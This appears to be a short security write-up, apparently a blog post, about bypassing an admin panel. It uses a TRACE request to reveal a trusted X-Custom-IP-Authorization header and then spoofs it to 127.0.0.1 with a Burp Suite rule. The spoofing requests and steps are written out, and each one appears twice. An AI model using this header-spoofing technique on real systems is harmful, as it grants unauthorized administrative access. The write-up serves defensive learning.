Authentication Bypass via Information Disclosure in HTTP Headers

The application trusted a custom HTTP header to decide whether a user was an admin.

And that header was leaked.

The admin panel was available at:

GET /admin

GET /admin

When accessing it normally, the server responded like:

Admin interface only accessible to administrators or local users.

Admin interface only accessible to administrators or local users.

The application had a hidden check:

X-Custom-IP-Authorization: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

If the request looked like it came from localhost, access was granted.

I sent the request using the TRACE method:

TRACE /admin HTTP/1.1
Host: id.target.com

TRACE /admin HTTP/1.1
Host: id.target.com

The response revealed a header automatically added by the frontend:

X-Custom-IP-Authorization: <my-ip>

X-Custom-IP-Authorization: <my-ip>

This was the missing information needed to bypass the restriction.

Using Burp Suite Match and Replace:

Add a new rule:

Type:

Request header

Request header

Replace with:

X-Custom-IP-Authorization: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

Now every request contains:

GET /admin HTTP/1.1
Host: target.com
X-Custom-IP-Authorization: 127.0.0.1

GET /admin HTTP/1.1
Host: target.com
X-Custom-IP-Authorization: 127.0.0.1

The server believes the request comes from localhost.

Admin access granted.

An attacker could:

The root problem is trusting a client-controlled header for authorization.

Never trust security headers from users.

Always test if the decision is controlled by user input.

A single trusted header can become a complete authentication bypass.

Written by Muhammed Asfan

Contents